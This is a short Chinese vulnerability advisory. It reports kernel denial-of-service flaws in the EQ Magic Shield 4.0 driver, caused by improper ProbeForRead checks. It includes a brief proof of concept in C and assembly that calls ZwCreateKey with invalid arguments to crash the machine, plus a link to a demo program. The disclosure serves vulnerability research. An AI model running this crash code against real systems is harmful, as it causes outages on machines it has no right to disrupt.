EQ魔法盾 4.0增强版(version:20080902及以下)多处内核拒绝服务漏洞

作者:MJ0011

EQ魔法盾的驱动程序员对用户态参数检查有一定概念,可惜没有正确理解ProbeForRead的用法,导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。

此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏

出问题的组件:EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155

EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d

该函数处于一个带Try..Except的结构中,使用ProbeForRead来检查参数

检查完毕后即直接用户态参数,而实际上,如果传入用户态无效地址,ProbeForRead是不会产生任何反应的,因此读写用户态缓存的代码也必须置于结构化异常处理之中。

这个问题存在于EQ的大部分HOOK函数中,有几十处之多,这里只举出一个例子:

ZwCreateKey,下面是测试代码,运行此代码后安装了EQ魔法盾的系统上即会引发蓝屏重启:

HMODULE hlib = LoadLibrary(“ntdll.dll”);
PVOID p = GetProcAddress(hlib , “ZwCreateKey”);

__asm{
push 0
push 0
push 0
push 0
push 1
push 0
push 0
call p
}

测试程序下载:http://mj0011.ys168.com ,漏洞演示下BSOD_EQ.rar

相关日志

发表评论